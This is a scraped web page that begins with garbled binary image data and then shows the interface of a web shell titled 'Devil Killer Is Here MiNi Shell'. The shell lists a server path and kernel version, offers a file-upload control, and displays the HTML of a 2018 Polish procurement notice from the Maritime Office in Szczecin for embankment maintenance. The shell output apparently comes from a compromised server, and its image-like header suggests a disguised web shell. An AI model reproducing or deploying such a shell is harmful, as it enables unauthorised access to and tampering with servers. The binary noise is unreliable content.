JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180404/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180404/540091-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 540091-N-2018 z dnia 2018-04-04 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Dyrektor Urzędu Morskiego w Szczecinie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Bieżące utrzymanie wałów na kwaterach pól refulacyjnych - Cz. A pole refulacyjne Dębina, Cz.B - pole refulacyjne D</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Dyrektor Urzędu Morskiego w Szczecinie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">14501700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Plac Batorego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">4</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">70207 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Szczecin</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">91 4403423, 4403523</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@ums.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">914 403 441</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">ww.ums.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">ww.ums.gov.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.ums.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Morski w Szczecinie - Zespół ds. Zamówień Publicznych Plac Stefana Batorego 4, 70-207 Szczecin pok. 110</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Bieżące utrzymanie wałów na kwaterach pól refulacyjnych - Cz. A pole refulacyjne Dębina, Cz.B - pole refulacyjne D</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PO.II.370.ZZP-3.7.18</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem niniejszego zamówienia są:Część A- Bieżące utrzymanie wałów na kwaterach pola refulacyjnego Dębina 1)	Lokalizacja : Pole Dębina zlokalizowane jest na 60 km toru wodnego Świnoujście - Szczecin, na wschodnim brzegu rzeki Odra na wysokości nabrzeża HUK, przeznaczone do odkładania urobku z pogłębiania toru na od km 67,70 do 32,00.Powierzchnia całkowita pola wynosi 31,38 ha, w tym powierzchnia kwater 20,24 ha. Całkowita długość obwałowań 2.679 m, pole jest podzielone na dwie kwatery: północną i południową.2)	Dojazd do obiektu:Tylko drogą wodną torem wodnym Świnoujście - Szczecin do miejsca cumowania na wysokości nabrzeża HUKZamawiający nie zapewnia transportu jakiegokolwiek sprzętu budowlanego, materiałów, potencjału ludzkiego itp. potrzebnego do wykonania zakresu zadania. Zamawiający nie zapewnia również dostępu do mediów, miejsca schronienia dla sprzętu i mienia oraz ochrony, Wykonawcy w czasie wykonywania zleconych prac.3)	Zakres zamówienia obejmuje:Roboty budowlane, które należy wykonać podczas modernizacji wału południowego okalających kwaterę południową, polegać będą na wykonaniu robót ziemnych na istniejącym wale. Istniejący wał pola refulacyjnego Dębina ma szerokości korony około 1,5m - 2.5 m i wysokości od 2,0 m od 2,7 m. Nie ma możliwości minięcia się ciężkiego sprzętu budowlanego.Długość wałów okalających kwaterę południową pokazuje inwentaryzacja geodezyjna stanowiąca załącznik nr 8 do SIWZ.Roboty ziemne po wcześniejszym wytyczeniu, należy prowadzić w sposób liniowy zaczynając od końca wału (uzupełnienie ziemią do zakładanej wysokości korony wału podniesionej w stosunku do rzeczywistej o 1,0 m oraz profilowanie korony i skarpy wału), przesuwając się w kierunku początku zakresu zadania. W pierwszej kolejności należy ułożyć geotkaninę pasami równolegle do osi korony wału, Zakład na geotkaninie powinien być nie mniejszy niż 0,5 m. Odległość miedzy szpilkami nie większa niż 0,5 m. Przy podstawie skarpy od strony kwatery, należy na rozłożoną i zaszpilkowaną geotkaninę ułożyć dwie warstwy worków jutowych wypełnionych piaskiem, które będą stanowić dodatkowe zabezpieczenie podstawy stopy skarpy. Geotkanina musi być wywinięta na koronę wału i zachodzić co najmniej na pół szerokości korony wału. Geotkanina powinna spełniać warunek : wytrzymałość na rozciąganie wzdłuż i wszerz min 150 kN/m2. Na tak przygotowane wzmocnione wały należy rozpocząć roboty ziemne, polegające na podwyższeniu korony wałów. Szerokość korony wału nie może być mniejsza niż 2,0 m (tak aby umożliwić przejazd sprzętu ciężkiego po koronie wału). Materiał ziemny należy pozyskać w części - z gruntu dowiezionego z ukopu(około 300-400 mb, bezpośrednio z kwatery północnej) oddalonego od miejsca wbudowania, przewidziana ilość około 700 m3 oraz w części z gruntu bezpośrednio z ukopu z kwatery wzdłuż podnoszonego wału.Na bieżąco należy wzdłuż podnoszonego wału prowadzić prace związane z odmulaniem rowu opaskowego. Przewidywana długość rowu do odmulenia - około 1200 mb.Przedmiar robót stanowiący Załącznik nr 9 do SIWZ stanowi jedynie wartość pomocniczą do wyceny ryczałtowej wykonania zadania podniesienia rzędnej wysokościowej wałów. Każdy potencjalny wykonawca sam jest zobowiązany przed przystąpieniem do przetargu zapoznać się z terenem jak też wykonać pomiar terenowy w celu dokładnego określenia zakresu rzeczowego wykonania prac do założonych przez Zamawiającego parametrów technicznych.Należy przewidzieć sprzęt koparkowy o odpowiednim wysięgu oraz ewentualnie przewidzieć sprzęt typu spycharka do przemieszczania urobku z pola refulacyjnego pod wał okalający kwaterę.W zakres prac wchodzi również oczyszczenie przepustów stalowych oraz remont kładek podejściowych do mnichów.Po zakończeniu prac modernizacyjnych wałów należy sporządzić inwentaryzację wysokościową , pokazującego szerokość i wysokość korony wałów.Prace będą wykonywane na terenie o torfowym podłożu, oddalonym od siedzib ludzkich. Prace należy prowadzić stosując przepisy zasad bhp. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.4)	Wymagania dotyczące wykonania zamówieniaWykonawca zobowiązany jest do przestrzegania przepisów dotyczących ochrony przyrody, w tym ustawy z dnia 16 kwietnia 2004 r o ochronie przyrody (Dz. U. z 2015 r. poz.1651 wraz z późn. zmianami),Prace należy prowadzić stosując przepisy zasady bhp szczególne w zakresie wykonania i odbioru robót ziemnych, robót umocnieniowych, melioracyjnych oraz leśnych. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.Wykonawca musi dysponować osobami, które będą uczestniczyć w realizacji zamówienia, które zostały przeszkolone w zakresie bhp przy tego rodzaju pracach zgodnie z treścią rozporządzenia Ministra Środowiska z 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny przy wykonywaniu prac z zakresu gospodarki leśnej (Dz. U. nr 161, poz. 1141).Część B - Bieżące utrzymanie wałów na kwaterach pola refulacyjnego D1)	Lokalizacja : Pole D zlokalizowane jest na działce 417/1 przy południowym cyplu wyspy Uznam, rozciąga się wzdłuż toru wodnego Świnoujście - Szczecin, od km14,00 do km 15,800, po zachodniej stronie Kanału Piastowskiego. Przeznaczone jest dla odkładania urobku z pogłębiania toru wodnego od km 0,00 do km 32,00.2)	Dojazd do obiektu:drogą wodną - torem wodnym Świnoujście - Szczecin do miejsca cumowania przy przystani dla refulera, lub drogą leśną od m. Karsibórz i dalej wzdłuż Kanału Piastowskiego w kierunku południowym, do falochronów wyjściowych na Zalew Szczeciński. Przejazd przez drogę leśną należy uzgodnić z Nadleśnictwem Międzyzdroje.Zamawiający nie zapewnia dostępu do mediów, miejsca schronienia mienia Wykonawcy, ochrony, w czasie wykonywania zleconych prac.3)	Ogólny zakres prac przewidzianych do wykonania:Roboty budowlane, które należy wykonać podczas modernizacji - przeformowania wału, polegać będą na wykonaniu robót ziemnych na istniejącym wale. Istniejący wał pola refulacyjnego D ma szerokości korony około 2,0 m - 2.5 m i wysokości od 2,0 m od 4,0 m. Nie ma możliwości minięcia się ciężkiego sprzętu budowlanego.Roboty ziemne po wcześniejszym wytyczeniu i wstępnym wyprofilowaniu skarpy należy prowadzić w sposób liniowy zaczynając od jednego z końców wału (uzupełnienie ziemią do istniejącej wysokości korony wału oraz profilowanie korony i skarpy wału), przesuwając się w kierunku drugiego z końców. W pierwszej kolejności należy ułożyć geotkaninę pasami prostopadle do osi korony wału. Zakład na geotkaninie powinien być nie mniejszy niż 0,5 m. Odległość miedzy szpilkami nie większa niż 0,5 m. Przy podstawie skarpy od strony naprawianej skarpy, należy na rozłożoną i zaszpilkowaną geotkaninę ułożyć dwie warstwy worków jutowych wypełnionych piaskiem, które będą stanowić dodatkowe zabezpieczenie podstawy stopy skarpy. Geotkanina musi być wywinięta na koronę wału i zachodzić co najmniej na 3/4 szerokości korony wału. Geotkanina powinna spełniać warunek : wytrzymałość na rozciąganie wzdłuż i wszerz min 150 kN/m2. Na tak przygotowane wzmocnione wały należy rozpocząć roboty ziemne, polegające na przeformowaniu i uzupełnieniu skarpy i korony wałów poprzez nasypanie na geotkaninę warstwy o grubości min 1,0 m. Szerokość korony wału należy odtworzyć do stanu istniejącego. Wał należy przeformować o 3-4 m w kierunku kwatery. Przewiduje się, iż w miejscu naprawy wału rzędna korony może być podniesiona o miąszność warstwy ułożonej na geotkaninie. Materiał ziemny należy pozyskać z ukopu z kwatery wzdłuż podnoszonego wału oraz należy przewidzieć przemieszczenie w razie braku materiału ziemnego poprzez przepchnięcie lub ukopanie urobku z odległości do 70 mb wzdłuż osi naprawianego wału.Do zakresu prac należy również miejscowe uzupełnienie urobkiem ziemnym wyrw na wałach, które powstały w skutek ingerencji zwierzyny występującej licznie na tym terenie.Do zakresu prac należy również wybudowanie nowego wału o wysokości 2,0 m i szerokości w koronie 2,5m na odcinku 150 mb. Materiał gruntowy należy pozyskać bezpośrednio z ukopu a w razie braku z przepchnięcia mas ziemnych z kwatery przy której zostanie wybudowany wał.Przedmiar robót stanowiący Załącznik nr 10 do SIWZ stanowi jedynie wartość pomocniczą do wyceny ryczałtowej wykonania zadania podniesienia rzędnej wysokościowej wałów. Każdy potencjalny wykonawca sam jest zobowiązany przed przystąpieniem do przetargu zapoznać się z terenem jak też wykonać pomiar terenowy w celu dokładnego określenia zakresu rzeczowego wykonania prac do założonych przez Zamawiającego parametrów technicznych.Należy przewidzieć sprzęt koparkowy o odpowiednim wysięgu oraz ewentualnie przewidzieć sprzęt typu spycharka do przemieszczania urobku z pola refulacyjnego pod wał okalający kwaterę.Prace będą wykonywane na terenie o torfowym i bagnistym podłożu, oddalonym od siedzib ludzkich. Prace należy prowadzić stosując przepisy zasad bhp. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.4)	Wymagania dotyczące wykonania zamówieniaW związku z tym, że pole refulacyjne D leży w bezpośrednim sąsiedztwie rezerwatu przyrody, Wykonawca zobowiązany jest do przestrzegania przepisów dotyczących ochrony przyrody , m. in. :a)	ustawy z dnia 16 kwietnia 2004 r o ochronie przyrody (Dz. U. z 2009 r. Nr 151, poz.1220; wraz z późn. zmianami),b)	Rozporządzenia nr 117/2006 Wojewody Zachodniopomorskiego z dnia 29 października 2007 r. w sprawie rezerwatu przyrody Karsiborskie Paprocie (Dz. Urz. Województwa Zachodniopomorskiego nr 108, poz. 1862).Prace będą wykonywane w terenie oddalonym od siedzib ludzkich na terenie gdzie występuje niestabilne podłoże gruntowe.Prace należy prowadzić stosując przepisy i zasady bhp szczególnie w zakresie wykonania i odbioru robót ziemnych, robót umocnieniowych, melioracyjnych oraz leśnych. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.Wykonawca musi dysponować osobami, które będą uczestniczyć w realizacji zamówienia, które zostały przeszkolone w zakresie bhp przy tego rodzaju pracach.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45247200-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">221507,35</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">pln</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span 